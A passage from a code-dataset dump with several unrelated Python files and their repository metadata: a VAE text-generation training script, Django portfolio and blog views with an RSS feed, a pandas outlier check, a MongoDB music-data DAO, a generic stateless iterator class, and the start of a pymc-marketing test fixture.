n_steps // 20\nlog_every_n_seconds = 5 * 60\nlog_every_n_steps = 10000\n\n#kld_start_inc = 0 #.01 * n_steps\nkld_start_inc 
= 10000\nkld_weight = 0.0\nkld_max = 1.0\nkld_inc = (kld_max - kld_weight) / (n_steps // 2)\n#kld_inc = 0.\nhabits_lambda = .2\n\nword_dropout = 0.25\n\ntemperature = 1.0\ntemperature_min = .75\n# should get to the temperature around 50% through training, then hold\ntemperature_dec = (temperature - temperature_min) / (0.5 * n_steps)\n#temperature_dec = 0.\nUSE_CUDA = True\n\n\n# Training\n# ------------------------------------------------------------------------------\n\nif len(sys.argv) < 2:\n print(\"Usage: python train.py [filename]\")\n sys.exit(1)\n\nreverse = True\ncsv = False\nif sys.argv[1].endswith(\".csv\"):\n csv = True\n\nif sys.argv[1].endswith(\".pkl\"):\n cache_path = sys.argv[1]\nelse:\n tmp_path = \"/Tmp/kastner/\"\n cache_path = tmp_path + sys.argv[1].split(os.sep)[-1].split(\".\")[0] + \"_stored_info.pkl\"\n\nif not os.path.exists(cache_path):\n print(\"Cached info at {} not found\".format(cache_path))\n print(\"Creating cache... this may take some time\")\n input_side, output_side, pairs = prepare_pair_data(sys.argv[1], vocabulary_size, reverse, csv)\n with open(cache_path, \"wb\") as f:\n pickle.dump((input_side, output_side, pairs), f)\nelse:\n start_load = time.time()\n print(\"Fetching cached info at {}\".format(cache_path))\n with open(cache_path, \"rb\") as f:\n input_side, output_side, pairs = pickle.load(f)\n end_load = time.time()\n print(\"Cache {} loaded, total load time {}\".format(cache_path, end_load - start_load))\n\nrandom_state = np.random.RandomState(1999)\nrandom_state.shuffle(pairs)\n\n\ndef random_training_set():\n pair_i = random_state.choice(len(pairs))\n pair = pairs[pair_i]\n inp = word_tensor(input_side, pair[0])\n target = word_tensor(output_side, pair[1])\n #inp_str = long_word_tensor_to_string(input_side, inp)\n #target_str = long_word_tensor_to_string(output_side, target)\n #from IPython import embed; embed(); raise ValueError()\n return inp, target\n\nn_words = input_side.n_words\ne = EncoderRNN(n_words, encoder_hidden_size, embed_size, n_encoder_layers, bidirectional=True)\n\n# custom weights initialization\ndef rnn_weights_init(m):\n for c in m.children():\n classname = c.__class__.__name__\n if classname.find(\"GRU\") != -1:\n for k, v in c.named_parameters():\n if \"weight\" in k:\n v.data.normal_(0.0, 0.02)\n\nd = DecoderRNN(embed_size, decoder_hidden_size, n_words, 1, word_dropout=word_dropout)\nrnn_weights_init(d)\n\nvae = VAE(e, d)\nif os.path.exists(\"vae.pt\"):\n print(\"Found saved model {}, continuing...\".format(\"vae.pt\"))\n shutil.copyfile(\"vae.pt\", \"vae.pt.bak\")\n vae = torch.load(\"vae.pt\")\n print(\"Found model was already trained for {} steps\".format(vae.steps_seen))\n temperature = temperature_min\n temperature_min = temperature_min\n temperature_dec = 0.\n\n kld_weight = kld_max\n kld_inc = 0.\n\n # change random seed and reshuffle the data, so that we don't repeat the same\n # use hash of the weights and biases? 
try with float16 to avoid numerical issues in the tails...\n new_seed = hash(tuple([hash(tuple(vae.state_dict()[k].cpu().numpy().ravel().astype(\"float16\"))) for k, v in vae.state_dict().items()]))\n # must be between 0 and 4294967295\n new_seed = abs(new_seed) % 4294967295\n print(\"Setting new random seed {}\".format(new_seed))\n random_state = np.random.RandomState(new_seed)\n print(\"Reshuffling training data\")\n random_state.shuffle(pairs)\n\noptimizer = torch.optim.Adam(vae.parameters(), lr=learning_rate)\ncriterion = nn.CrossEntropyLoss()\n\n\nif USE_CUDA:\n vae.cuda()\n criterion.cuda()\n print(\"Using CUDA!\")\n\n\n\"\"\"\nsave_every = 5000\njob = sconce.Job('vae', {\n 'hidden_size': hidden_size,\n 'embed_size': embed_size,\n 'learning_rate': learning_rate,\n 'kld_weight': kld_weight,\n 'temperature': temperature,\n 'grad_clip': grad_clip,\n})\n\njob.log_every = log_every\n\"\"\"\n\ndef save():\n save_filename = 'vae.pt'\n torch.save(vae, save_filename)\n print('Saved as %s' % save_filename)\n\ntry:\n # set it so that the first one logs\n start_time = time.time()\n last_log_time = time.time() - log_every_n_seconds\n last_log_step = -log_every_n_steps - 1\n start_steps = vae.steps_seen\n for step in range(n_steps):\n input, target = random_training_set()\n optimizer.zero_grad()\n\n m, l, z, decoded = vae(input, target, temperature)\n if temperature > temperature_min:\n temperature -= temperature_dec\n\n ll_loss = criterion(decoded, target)\n #job.record(step, loss.data[0])\n\n KLD = -0.5 * (2 * l - torch.pow(m, 2) - torch.pow(torch.exp(l), 2) + 1)\n # ha bits , like free bits but over whole layer\n clamp_KLD = torch.clamp(KLD.mean(), min=habits_lambda).squeeze()\n #neg_KLD = -1 * clamp_KLD\n loss = ll_loss + clamp_KLD * kld_weight\n\n if step > kld_start_inc and kld_weight < kld_max:\n kld_weight += kld_inc\n\n loss.backward()\n # print('from', next(vae.parameters()).grad.data[0][0])\n ec = torch.nn.utils.clip_grad_norm(vae.parameters(), grad_clip)\n # print('to ', next(vae.parameters()).grad.data[0][0])\n optimizer.step()\n\n def log_and_generate(tag, value):\n if tag == \"step\":\n print('|%s|[%d] %.4f (k=%.4f, t=%.4f, kl=%.4f, ckl=%.4f, nll=%.4f, ec=%.4f)' % (\n tag, value, loss.data[0], kld_weight, temperature, KLD.data.mean(), clamp_KLD.data[0], ll_loss.data[0], ec\n ))\n elif tag == \"time\":\n print('|%s|[%.4f] %.4f (k=%.4f, t=%.4f, kl=%.4f, ckl=%.4f, nll=%.4f, ec=%.4f)' % (\n tag, value, loss.data[0], kld_weight, temperature, KLD.data.mean(), clamp_KLD.data[0], ll_loss.data[0], ec\n ))\n inp_str = long_word_tensor_to_string(input_side, input)\n print(' (input {}) \"{}\"'.format(tag, inp_str))\n target_str = long_word_tensor_to_string(output_side, target)\n if target_str.endswith(\"EOS \"):\n target_str = target_str[:-4]\n #from IPython import embed; embed(); raise ValueError()\n # flip it back\n print(' (target {}) \"{}\"'.format(tag, target_str[::-1]))\n generated = vae.decoder.generate(z, MAX_LENGTH, temperature)\n generated_str = float_word_tensor_to_string(output_side, generated)\n if generated_str.endswith(\"EOS \"):\n generated_str = generated_str[:-4]\n # flip it back\n print('(generated {}) \"{}\"'.format(tag, generated_str[::-1]))\n print('')\n\n if last_log_time <= time.time() - log_every_n_seconds:\n log_and_generate(\"time\", time.time() - start_time)\n last_log_time = time.time()\n\n if last_log_step <= step - log_every_n_steps:\n log_and_generate(\"step\", step)\n last_log_step = step\n\n if step > 0 and step % save_every == 0 or step == (n_steps - 1):\n 
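# persist the cumulative step count so a resumed run that reloads vae.pt\n # knows how many training steps this model has already seen\n 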
vae.steps_seen = start_steps + step\n save()\n\n save()\n\nexcept KeyboardInterrupt as err:\n print(\"ERROR\", err)\n print(\"Saving before quit...\")\n save()\n\n", "repo_name": "sindhusweety/VAE-Generating-Sentences-From-a-Continuous-Space", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 7633, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "46", "api": [{"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 54, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "datasets.prepare_pair_data", "line_number": 62, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 62, "usage_type": "attribute"}, {"api_name": "cPickle.dump", "line_number": 64, "usage_type": "call"}, {"api_name": "cPickle.load", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 121, "usage_type": "attribute"}]} +{"seq_id": "2302794556", "text": "from django.shortcuts import render, get_object_or_404\nfrom .models import Security,Description\nfrom .forms import SearchForm,RebalanceForm,SecurityForm,DescriptionForm,Des_updateForm\n\n\n\n#Serves the index.html page\ndef index(request):\n searchForm = SearchForm(request.GET)\n if searchForm.is_valid():\n keyword = searchForm.cleaned_data['keyword']\n securities = Security.objects.filter(asset__contains=keyword)\n else:\n searchForm = SearchForm()\n securities = Security.objects.all()\n context = {\n 'securities':securities,\n 'searchform':searchForm,\n }\n return render(request, 'port/index.html',context)\n\n\n#Serves the detail.html page\ndef detail(request,id):\n security = get_object_or_404(Security, pk=id)\n #Auto-create the Description record that corresponds to the Security model\n try:\n description = Description.objects.get(name_id=id)\n except Description.DoesNotExist:\n descriptionForm = DescriptionForm({'name':id})\n description = descriptionForm.save()\n context = {\n 'security':security,\n 'description':description,\n }\n return render(request, 'port/detail.html',context)\n\n\n#index.html >> Add button >> serves new.html\ndef new(request):\n securityForm = SecurityForm()\n context = {\n 'message':'Add a New Security',\n 'securityForm':securityForm,\n }\n return render(request, 'port/new.html',context)\n\n#Receives input from the new.html form and actually adds the data to the Security model\ndef create(request):\n if request.method == 'POST':\n securityForm = SecurityForm(request.POST)\n if securityForm.is_valid():\n security=securityForm.save()\n context = {\n 'security': security,\n }\n #The index view logic is repeated below so that index.html can 
also be rendered at the create URL.\n #It would be best to send the post-create URL straight to the index view, though....\n searchForm = SearchForm(request.GET)\n if searchForm.is_valid():\n keyword = searchForm.cleaned_data['keyword']\n securities = Security.objects.filter(asset__contains=keyword)\n else:\n searchForm = SearchForm()\n securities = Security.objects.all()\n context = {\n 'securities':securities,\n 'searchform':searchForm,\n }\n return render(request, 'port/index.html', context)\n\n\n#detail.html >> Rebalance button >> serves edit.html\ndef edit(request,id):\n security = get_object_or_404(Security, pk=id)\n rebalanceForm = RebalanceForm(instance=security)\n context = {\n 'message':'Rebalance a Position',\n 'security':security,\n 'rebalanceForm':rebalanceForm,\n }\n return render(request, 'port/edit.html',context)\n\n#Receives input from the edit.html form and actually edits the Security model data\ndef update(request,id):\n if request.method == 'POST':\n security = get_object_or_404(Security, pk=id)\n rebalanceForm = RebalanceForm(request.POST, instance=security)\n if rebalanceForm.is_valid():\n rebalanceForm.save()\n try:\n description = Description.objects.get(name_id=id)\n except Description.DoesNotExist:\n description = None\n context = {\n 'security':security,\n 'description':description,\n }\n return render(request, 'port/detail.html',context)\n\n\n#detail.html >> Remove button >> serves confirm_delete.html\ndef confirm_delete(request,id):\n security = get_object_or_404(Security, pk=id)\n context ={\n 'security':security,\n }\n return render(request, 'port/confirm_delete.html',context)\n\n#Receives the confirm_delete.html input and actually deletes the data from the Security model\ndef delete(request,id):\n security = get_object_or_404(Security, pk=id)\n security.delete()\n securities = Security.objects.all()\n context = {\n 'message':'Delete Security ' + str(id),\n 'securities':securities,\n }\n return render(request, 'port/index.html',context)\n\n\n#detail.html >> Edit Description Info link >> serves des_edit.html\ndef des_edit(request,id):\n security = get_object_or_404(Description,name_id=id)\n des_updateForm = Des_updateForm(instance=security)\n if des_updateForm.is_valid():\n des_updateForm.save()\n context = {\n 'message':'Edit Description info',\n 'security':security,\n 'des_updateForm':des_updateForm,\n }\n return render(request, 'port/des_edit.html',context)\n\n#Receives the des_edit.html input and actually edits the Description model data\ndef des_update(request,id):\n if request.method == 'POST':\n security = get_object_or_404(Security, pk=id)\n description = get_object_or_404(Description,name_id=id)\n des_updateForm = Des_updateForm(request.POST,instance=description)\n if des_updateForm.is_valid():\n des_updateForm.save()\n context = {\n 'description':description,\n 'security':security,\n 'des_updateForm':des_updateForm,\n }\n return render(request,'port/detail.html',context)\n", "repo_name": "na2me/PORT", "sub_path": "port/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "forms.SearchForm", "line_number": 9, "usage_type": "call"}, {"api_name": "models.Security.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Security.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Security", "line_number": 12, "usage_type": "name"}, {"api_name": "forms.SearchForm", "line_number": 14, "usage_type": "call"}, {"api_name": "models.Security.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": 
"models.Security.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Security", "line_number": 15, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 25, "usage_type": "argument"}, {"api_name": "models.Description.objects.get", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Description.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.Description", "line_number": 28, "usage_type": "name"}, {"api_name": "models.Description.DoesNotExist", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Description", "line_number": 29, "usage_type": "name"}, {"api_name": "forms.DescriptionForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "forms.SecurityForm", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 46, "usage_type": "call"}, {"api_name": "forms.SecurityForm", "line_number": 51, "usage_type": "call"}, {"api_name": "forms.SearchForm", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Security.objects.filter", "line_number": 62, "usage_type": "call"}, {"api_name": "models.Security.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models.Security", "line_number": 62, "usage_type": "name"}, {"api_name": "forms.SearchForm", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Security.objects.all", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Security.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "models.Security", "line_number": 65, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 75, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 75, "usage_type": "argument"}, {"api_name": "forms.RebalanceForm", "line_number": 76, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 82, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 87, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 87, "usage_type": "argument"}, {"api_name": "forms.RebalanceForm", "line_number": 88, "usage_type": "call"}, {"api_name": "models.Description.objects.get", "line_number": 92, "usage_type": "call"}, {"api_name": "models.Description.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "models.Description", "line_number": 92, "usage_type": "name"}, {"api_name": "models.Description.DoesNotExist", "line_number": 93, "usage_type": "attribute"}, {"api_name": "models.Description", "line_number": 93, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 104, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 108, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 112, "usage_type": "argument"}, {"api_name": "models.Security.objects.all", "line_number": 114, "usage_type": 
"call"}, {"api_name": "models.Security.objects", "line_number": 114, "usage_type": "attribute"}, {"api_name": "models.Security", "line_number": 114, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 119, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Description", "line_number": 124, "usage_type": "argument"}, {"api_name": "forms.Des_updateForm", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 133, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 138, "usage_type": "call"}, {"api_name": "models.Security", "line_number": 138, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 139, "usage_type": "call"}, {"api_name": "models.Description", "line_number": 139, "usage_type": "argument"}, {"api_name": "forms.Des_updateForm", "line_number": 140, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 148, "usage_type": "call"}]} +{"seq_id": "74573588618", "text": "import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ntrain = pd.read_csv('N:/train.csv')\r\ntest = pd.read_csv('N:/test.csv')\r\n\r\nfig = plt.figure()\r\nsns.boxplot(x='Survived', y='Age', hue='Pclass', data=train)\r\n\r\ntrain2 = train.dropna()\r\n\r\nperAge = np.percentile(train2['Age'],[0,25,50,75,100])\r\nIQR = perAge[3]-perAge[1]\r\nupperAge = perAge[3]+IQR*1.5\r\nlowerAge = perAge[1]-IQR*1.5\r\nprint(train2.loc[(train2['Age'] > upperAge) | (train2['Age'] < lowerAge), 'Age'])\r\n#outliers identified with age>upper or age upperAge) | (train3['Age'] < lowerAge), 'Age'])\r\n#here we use 1.5 IQR to examine the outliers", "repo_name": "TingeOGinge/big_data", "sub_path": "week-3/pandasOutlier.py", "file_name": "pandasOutlier.py", "file_ext": "py", "file_size_in_byte": 941, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "pandas.read_csv", "line_number": 6, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "seaborn.boxplot", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "71056818059", "text": "# coding=utf-8\n\n\"\"\"\n负责进行云音乐的数据库相关操作\n\nCreated by jayvee on 16/12/24.\n\"\"\"\nfrom utils.db_utils import get_db_inst\nfrom utils.logger_utils import data_process_logger\n\n\nclass CloudMusicDAO:\n def __init__(self, db_name, collection_name):\n self.db_name = db_name\n self.collection_name = collection_name\n self.db_inst = get_db_inst(self.db_name, self.collection_name)\n\n def save_unique_item(self, data_obj, primary_key='userId', is_overwrite=False, is_inform=False):\n \"\"\"\n 存储数据对象,并避免重复存储\n Args:\n data_obj:\n primary_key:\n is_overwrite:\n\n Returns:\n\n \"\"\"\n find_result = self.db_inst.find_one({primary_key: data_obj[primary_key]}, {primary_key: 1})\n # is_exist = user_dbinst.find({'userId': userinfo['userId']}).count() != 0\n # print find_result.count()\n\n if not find_result:\n self.db_inst.insert(data_obj)\n elif is_overwrite:\n 
self.db_inst.update({primary_key: data_obj[primary_key]}, data_obj)\n if is_inform:\n data_process_logger.warn(\n 'overwrite item %s in %s' % (data_obj[primary_key], self.collection_name))\n else:\n if is_inform:\n data_process_logger.warn(\n 'Item %s exist! in %s' % (data_obj[primary_key], self.collection_name))\n", "repo_name": "JayveeHe/MusicTaster", "sub_path": "utils/cloudmusic_dao.py", "file_name": "cloudmusic_dao.py", "file_ext": "py", "file_size_in_byte": 1429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "46", "api": [{"api_name": "utils.db_utils.get_db_inst", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.logger_utils.data_process_logger.warn", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.logger_utils.data_process_logger", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.logger_utils.data_process_logger.warn", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.logger_utils.data_process_logger", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "10302615068", "text": "from django.contrib.syndication.views import Feed\nfrom django.core import serializers\nfrom django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\nfrom django.core.paginator import PageNotAnInteger\nfrom django.db.models import Count\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_list_or_404\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\n\nfrom .models import Post\nfrom .templatetags.markdownify import markdown\n\n\ndef home(request):\n if request.user.is_authenticated:\n posts = Post.objects.all()\n else:\n posts = Post.published.all()\n\n paginator = Paginator(posts, 5)\n page = request.GET.get(\"page\")\n\n try:\n post_list = paginator.page(page)\n except PageNotAnInteger:\n post_list = paginator.page(1)\n except EmptyPage:\n post_list = paginator.page(paginator.num_pages)\n return render(request, \"home.html\", {\"post_list\": post_list})\n\n\ndef similar_posts_by_tag(request, tag_slug, pk):\n post = Post.objects.get(pk=pk)\n post_tags_ids = post.tags.values_list(\"id\", flat=True)\n if request.user.is_authenticated:\n similar_posts = Post.objects.filter(tags__in=post_tags_ids).exclude(\n id=post.id\n )\n similar_posts = similar_posts.annotate(\n same_tags=Count(\"tags\")\n ).order_by(\"-same_tags\", \"-publish\")[:4]\n else:\n similar_posts = Post.published.filter(tags__in=post_tags_ids).exclude(\n id=post.id\n )\n similar_posts = similar_posts.annotate(\n same_tags=Count(\"tags\")\n ).order_by(\"-same_tags\", \"-publish\")[:4]\n return render(request, \"tag.html\", {\"post_list\": similar_posts})\n\n\ndef detail(request, slug):\n post = Post.objects.get(slug=slug)\n tags = post.tags.all()\n return render(request, \"post.html\", {\"post\": post, \"tags\": tags})\n\n\ndef about(request):\n return render(request, \"about.html\")\n\n\ndef archives(request):\n if request.user.is_authenticated:\n post_list = Post.objects.all()\n else:\n post_list = Post.published.all()\n return render(\n request, \"archives.html\", {\"post_list\": post_list, \"error\": False}\n )\n\n\ndef blog_search(request):\n if \"search\" in request.GET:\n search = request.GET[\"search\"]\n if not search:\n return render(request, \"home.html\")\n else:\n post_list = get_list_or_404(\n Post.objects.filter(title__icontains=search)\n )\n if len(post_list) == 0:\n return render(\n request,\n \"archives.html\",\n {\"post_list\": post_list, 
\"error\": True},\n )\n else:\n return render(\n request,\n \"archvies.html\",\n {\"post_list\": post_list, \"error\": False},\n )\n return redirect(\"/\")\n\n\nclass RSSFeed(Feed):\n title = \"RSS feed - Articles\"\n link = \"/feeds/posts/\"\n description = \"RSS feed - Blog Posts\"\n\n def items(self):\n return get_list_or_404(Post.published.all())\n\n def items_title(self, item):\n return item.title\n\n def item_pubdate(self, item):\n return item.created_at\n\n def item_description(self, item):\n return markdown(item.content)\n", "repo_name": "andreztz/django-blog", "sub_path": "blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3272, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "46", "api": [{"api_name": "models.Post.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 18, "usage_type": "name"}, {"api_name": "models.Post.published.all", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Post.published", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 20, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 22, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 27, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 29, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Post.objects.get", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Post.published.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Post.published", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 49, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 51, "usage_type": "call"}, {"api_name": "models.Post.objects.get", "line_number": 55, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 55, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 61, "usage_type": "call"}, {"api_name": "models.Post.objects.all", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 66, "usage_type": "name"}, {"api_name": "models.Post.published.all", "line_number": 68, "usage_type": "call"}, {"api_name": "models.Post.published", "line_number": 68, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 68, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 69, "usage_type": "call"}, {"api_name": 
"django.shortcuts.render", "line_number": 78, "usage_type": "call"}, {"api_name": "django.shortcuts.get_list_or_404", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 81, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 81, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 90, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 95, "usage_type": "call"}, {"api_name": "django.contrib.syndication.views.Feed", "line_number": 98, "usage_type": "name"}, {"api_name": "django.shortcuts.get_list_or_404", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Post.published.all", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Post.published", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 104, "usage_type": "name"}, {"api_name": "templatetags.markdownify.markdown", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "34546285792", "text": "from typing import Callable, Generator, Generic, List, Optional, Tuple, TypeVar\n\nYields = TypeVar(\"Yields\", contravariant=True)\nSends = TypeVar(\"Sends\", contravariant=True)\n\n\nclass StatelessIterator(Generic[Yields, Sends]):\n def __init__(\n self,\n generator: Callable[[], Generator[Yields, Sends, None]],\n inputs: Optional[List[Sends]] = None,\n ):\n self.generator = generator\n self.inputs = inputs or []\n\n def send(self, x: Sends) -> Tuple[Yields, \"StatelessIterator[Yields, Sends]\"]:\n it = self.generator()\n inputs = self.inputs\n next(it)\n for inp in inputs:\n it.send(inp)\n y: Yields = it.send(x)\n it2 = StatelessIterator(self.generator, inputs + [x])\n return y, it2\n\n def __next__(self) -> Tuple[Yields, \"StatelessIterator[Yields, Sends]\"]:\n it = self.generator()\n assert not self.inputs\n y: Yields = next(it)\n it2: StatelessIterator[Yields, Sends] = StatelessIterator(self.generator, [])\n return y, it2\n", "repo_name": "ethanabrooks/pytypeclass", "sub_path": "pytypeclass/stateless_iterator.py", "file_name": "stateless_iterator.py", "file_ext": "py", "file_size_in_byte": 1047, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "typing.TypeVar", "line_number": 3, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 4, "usage_type": "call"}, {"api_name": "typing.Generic", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Generator", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "31099430020", "text": "from typing import List, Optional\n\nimport arviz as az\nimport numpy as np\nimport pandas as pd\nimport pymc as pm\nimport pytest\n\nfrom pymc_marketing.mmm.delayed_saturated_mmm import DelayedSaturatedMMM\n\nseed: int = sum(map(ord, \"pymc_marketing\"))\nrng: np.random.Generator = np.random.default_rng(seed=seed)\n\n\n@pytest.fixture(scope=\"class\")\ndef toy_df() -> pd.DataFrame:\n date_data: pd.DatetimeIndex = 
